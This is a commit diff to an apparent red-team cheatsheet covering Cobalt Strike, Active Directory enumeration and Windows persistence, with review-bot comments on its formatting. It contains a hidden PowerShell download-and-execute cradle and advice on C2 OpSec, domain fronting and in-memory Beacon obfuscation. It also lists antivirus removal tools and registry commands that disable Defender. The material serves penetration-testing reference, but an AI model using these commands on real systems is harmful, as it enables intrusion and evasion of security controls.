AV Removal + Cobalt SleepKit

Swissky 2022-03-01 23:01:25 +01:00
parent 6a193730be
commit 521975a05c
3 changed files with 66 additions and 81 deletions

View File

@ -232,6 +232,7 @@ Use the correct collector
.\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --JSONFolder <PathToFile> .\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --JSONFolder <PathToFile>
.\SharpHound.exe -c all -d active.htb --LdapUsername <UserName> --LdapPassword <Password> --domaincontroller 10.10.10.100 .\SharpHound.exe -c all -d active.htb --LdapUsername <UserName> --LdapPassword <Password> --domaincontroller 10.10.10.100
.\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23 .\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23
.\SharpHound.exe -c all,GPOLocalGroup --searchforest
# or run the collector on the machine using Powershell # or run the collector on the machine using Powershell
# https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1 # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
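Review bot: the new `.\SharpHound.exe -c all,GPOLocalGroup --searchforest` line is the only invocation in this list whose purpose is not inferable from a comment or a distinctive option set; a one-line `#` comment stating what it collects, in the style of the "or run the collector" comment below it, would keep the list self-explanatory. While here, the unchanged comment spells the product "Powershell"; the usual capitalization is "PowerShell".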

View File

@ -18,7 +18,8 @@ $ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstri
* [Infrastructure](#infrastructure) * [Infrastructure](#infrastructure)
* [Redirectors](#redirectors) * [Redirectors](#redirectors)
* [Domain fronting](#domain-fronting) * [Domain fronting](#domain-fronting)
* [OpSec](#opsec) * [OpSec](#opsec)
* [Customer ID](#customer-id)
* [Payloads](#payloads) * [Payloads](#payloads)
* [DNS Beacon](#dns-beacon) * [DNS Beacon](#dns-beacon)
* [SMB Beacon](#smb-beacon) * [SMB Beacon](#smb-beacon)
@ -37,6 +38,7 @@ $ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstri
* [Resource Kit](#resource-kit) * [Resource Kit](#resource-kit)
* [Artifact Kit](#artifact-kit) * [Artifact Kit](#artifact-kit)
* [Mimikatz Kit](#mimikatz-kit) * [Mimikatz Kit](#mimikatz-kit)
* [Beacon Object Files](#beacon-object-files)
* [NTLM Relaying via Cobalt Strike](#ntlm-relaying-via-cobalt-strike) * [NTLM Relaying via Cobalt Strike](#ntlm-relaying-via-cobalt-strike)
* [References](#references) * [References](#references)
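Review bot: the table of contents gains "Beacon Object Files" but not the "Sleep Mask Kit" section that this same commit adds between the Mimikatz Kit and Beacon Object Files headings; add `* [Sleep Mask Kit](#sleep-mask-kit)` here so the new section is reachable from the TOC like its siblings.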
@ -53,14 +55,14 @@ socat TCP4-LISTEN:80,fork TCP4:[TEAM SERVER]:80
### Domain Fronting ### Domain Fronting
* New Listener > HTTP Host Header * New Listener > HTTP Host Header
* Target Finance & Healthcare domains * Choose a domain in "Finance & Healthcare" sector
### OpSec ## OpSec
**Don't** **Don't**
* Change default self-signed HTTPS certificate * Use default self-signed HTTPS certificate
* Change default port (50050) * Use default port (50050)
* 0.0.0.0 DNS response * Use 0.0.0.0 DNS response
* Metasploit compatibility, ask for a payload : `wget -U "Internet Explorer" http://127.0.0.1/vl6D` * Metasploit compatibility, ask for a payload : `wget -U "Internet Explorer" http://127.0.0.1/vl6D`
**Do** **Do**
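Review bot: `### OpSec` is promoted to `## OpSec` while the neighbouring `### Domain Fronting` keeps its level, so OpSec now sits outside the Infrastructure section even though the TOC above still lists it alongside Redirectors and Domain fronting; either keep `###` or move the TOC entry to match. Separately, the new wording `Choose a domain in "Finance & Healthcare" sector` is missing an article ("in the ... sector").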
@ -69,9 +71,17 @@ socat TCP4-LISTEN:80,fork TCP4:[TEAM SERVER]:80
* Firewall 50050 and access via SSH tunnel * Firewall 50050 and access via SSH tunnel
* Edit default HTTP 404 page and Content type: text/plain * Edit default HTTP 404 page and Content type: text/plain
* No staging `set hosts_stage` to `false` in Malleable C2 * No staging `set hosts_stage` to `false` in Malleable C2
* Use Malleable Profile to taylor your attack to specific actors
### Customer ID
## Payload > The Customer ID is a 4-byte number associated with a Cobalt Strike license key. Cobalt Strike 3.9 and later embed this information into the payload stagers and stages generated by Cobalt Strike.
* The Customer ID value is the last 4-bytes of a Cobalt Strike payload stager in Cobalt Strike 3.9 and later.
* The trial has a Customer ID value of 0.
* Cobalt Strike does not use the Customer ID value in its network traffic or other parts of the tool
## Payloads
### DNS Beacon ### DNS Beacon
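Review bot: "taylor your attack" should be "tailor". The Customer ID block quote has no attribution; it reads as vendor documentation, so cite its source next to the quote. The last of the three Customer ID bullets also lacks the terminating period the two above it have.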
@ -167,11 +177,14 @@ $ %windir%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe \\10.10.10.10\Shared\d
## Malleable C2 ## Malleable C2
List of Malleable Profiles hosted on Github
* Cobalt Strike - Malleable C2 Profiles https://github.com/xx0hcd/Malleable-C2-Profiles * Cobalt Strike - Malleable C2 Profiles https://github.com/xx0hcd/Malleable-C2-Profiles
* Cobalt Strike Malleable C2 Design and Reference Guide https://github.com/threatexpress/malleable-c2 * Cobalt Strike Malleable C2 Design and Reference Guide https://github.com/threatexpress/malleable-c2
* Malleable-C2-Profiles https://github.com/rsmudge/Malleable-C2-Profiles * Malleable-C2-Profiles https://github.com/rsmudge/Malleable-C2-Profiles
* SourcePoint is a C2 profile generator https://github.com/Tylous/SourcePoint * SourcePoint is a C2 profile generator https://github.com/Tylous/SourcePoint
Example of syntax
```powershell ```powershell
set useragent "SOME AGENT"; # GOOD set useragent "SOME AGENT"; # GOOD
set useragent 'SOME AGENT'; # BAD set useragent 'SOME AGENT'; # BAD
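Review bot: the unchanged fence here is tagged `powershell`, but the content is Malleable C2 profile syntax, not PowerShell, so the tag only produces wrong highlighting; a neutral tag (or none) is better. In the added lines, "Github" should be "GitHub" and "Example of syntax" reads better as "Example of the syntax:" since it introduces the block.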
@ -186,75 +199,10 @@ prepend "!@#$%^&*()";
``` ```
Check a profile with `./c2lint`. Check a profile with `./c2lint`.
* A result of 0 is returned if c2lint completes with no errors
```powershell * A result of 1 is returned if c2lint completes with only warnings
# * A result of 2 is returned if c2lint completes with only errors
# Etumbot Profile * A result of 3 is returned if c2lint completes with both errors and warning
# http://www.arbornetworks.com/asert/2014/06/illuminating-the-etumbot-apt-backdoor/
#
# Author: @harmj0y
#
set sample_name "Etumbot";
set sleeptime "5000";
set jitter "0";
set maxdns "255";
set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";
http-get {
set uri "/image/";
client {
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8";
header "Referer" "http://www.google.com";
header "Pragma" "no-cache";
header "Cache-Control" "no-cache";
metadata {
netbios;
append "-.jpg";
uri-append;
}
}
server {
header "Content-Type" "img/jpg";
header "Server" "Microsoft-IIS/6.0";
header "X-Powered-By" "ASP.NET";
output {
base64;
print;
}
}
}
http-post {
set uri "/history/";
client {
header "Content-Type" "application/octet-stream";
header "Referer" "http://www.google.com";
header "Pragma" "no-cache";
header "Cache-Control" "no-cache";
id {
netbiosu;
append ".asp";
uri-append;
}
output {
base64;
print;
}
}
server {
header "Content-Type" "img/jpg";
header "Server" "Microsoft-IIS/6.0";
header "X-Powered-By" "ASP.NET";
output {
base64;
print;
}
}
}
```
## Files ## Files
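Review bot: "both errors and warning" in the last c2lint bullet should be "warnings". Deleting the full Etumbot profile leaves the section with only the short syntax snippet as a worked example; if the removal is for length, a pointer to where the profile lives in one of the profile collections linked just above would preserve the reference for readers.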
@ -474,6 +422,32 @@ Artifact Kit (Cobalt Strike 4.0) - https://www.youtube.com/watch?v=6mC21kviwG4 :
* Load the mimikatz.cna aggressor script * Load the mimikatz.cna aggressor script
* Use mimikatz functions as normal * Use mimikatz functions as normal
### Sleep Mask Kit
> The Sleep Mask Kit is the source code for the sleep mask function that is executed to obfuscate Beacon, in memory, prior to sleeping.
Use the included `build.sh` or `build.bat` script to build the Sleep Mask Kit on Kali Linux or Microsoft Windows. The script builds the sleep mask object file for the three types of Beacons (default, SMB, and TCP) on both x86 and x64 architectures in the sleepmask directory. The default type supports HTTP, HTTPS, and DNS Beacons.
## Beacon Object Files
> A BOF is just a block of position-independent code that receives pointers to some Beacon internal APIs
Example: https://github.com/Cobalt-Strike/bof_template/blob/main/beacon.h
* Compile
```ps1
# To compile this with Visual Studio:
cl.exe /c /GS- hello.c /Fohello.o
# To compile this with x86 MinGW:
i686-w64-mingw32-gcc -c hello.c -o hello.o
# To compile this with x64 MinGW:
x86_64-w64-mingw32-gcc -c hello.c -o hello.o
```
* Execute: `inline-execute /path/to/hello.o`
## NTLM Relaying via Cobalt Strike ## NTLM Relaying via Cobalt Strike
```powershell ```powershell
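Review bot: the compile block is fenced as `ps1` while the rest of this file uses `powershell`, and the commands are `cl.exe`/MinGW invocations rather than PowerShell, so pick one tag consistently. `hello.c` is referenced by the compile commands but never shown or linked, and the line labelled "Example:" points at `beacon.h`, which is the BOF header/template rather than an example; label it accordingly. Both new block quotes (Sleep Mask Kit and BOF) would benefit from a source citation, as the other quoted material in this file has none either.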
@ -502,3 +476,4 @@ beacon> PortBender redirect 445 8445
* [How to Write Malleable C2 Profiles for Cobalt Strike - January 24, 2017](https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/) * [How to Write Malleable C2 Profiles for Cobalt Strike - January 24, 2017](https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/)
* [NTLM Relaying via Cobalt Strike - July 29, 2021 - Rasta Mouse](https://rastamouse.me/ntlm-relaying-via-cobalt-strike/) * [NTLM Relaying via Cobalt Strike - July 29, 2021 - Rasta Mouse](https://rastamouse.me/ntlm-relaying-via-cobalt-strike/)
* [Cobalt Strike - User Guide](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/welcome_main.htm) * [Cobalt Strike - User Guide](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/welcome_main.htm)
* [Cobalt Strike 4.5 - User Guide PDF](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf)
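Review bot: the new reference entry lacks the date (and, where applicable, author) that the other entries carry, e.g. "- July 29, 2021 - Rasta Mouse"; the preceding "Cobalt Strike - User Guide" entry also links to the same documentation site, so consider either merging the two or keeping both in one format.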

View File

@ -4,8 +4,10 @@
* [Tools](#tools) * [Tools](#tools)
* [Hide Your Binary](#hide-your-binary) * [Hide Your Binary](#hide-your-binary)
* [Disable Windows Defender](#disable-windows-defender) * [Disable Antivirus and Security](#disable-antivirus-and-security)
* [Disable Windows Firewall](#disable-windows-firewall) * [Antivirus Removal](#antivirus-removal)
* [Disable Windows Defender](#disable-windows-defender)
* [Disable Windows Firewall](#disable-windows-firewall)
* [Simple User](#simple-user) * [Simple User](#simple-user)
* [Registry HKCU](#registry-hkcu) * [Registry HKCU](#registry-hkcu)
* [Startup](#startup) * [Startup](#startup)
@ -47,7 +49,14 @@
PS> attrib +h mimikatz.exe PS> attrib +h mimikatz.exe
``` ```
## Disable Windows Defender ## Disable Antivirus and Security
### Antivirus Removal
* [Sophos Removal Tool.ps1](https://github.com/ayeskatalas/Sophos-Removal-Tool/)
* [Symantec CleanWipe](https://knowledge.broadcom.com/external/article/178870/download-the-cleanwipe-removal-tool-to-u.html)
### Disable Windows Defender
```powershell ```powershell
# Disable Defender # Disable Defender
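Review bot: the two Antivirus Removal links have no accompanying text, unlike the Defender section below where each command is explained in a comment; state what each link is (the Symantec one is a vendor knowledge-base article for CleanWipe, the Sophos one is a third-party repository). The first bullet's title ends in `.ps1` as if it were a script file while the link is a repository root, so either name the repository or link the script itself.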
@ -68,7 +77,7 @@ Add-MpPreference -ExclusionPath C:\Video, C:\install
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
``` ```
## Disable Windows Firewall ### Disable Windows Firewall
```powershell ```powershell
Netsh Advfirewall show allprofiles Netsh Advfirewall show allprofiles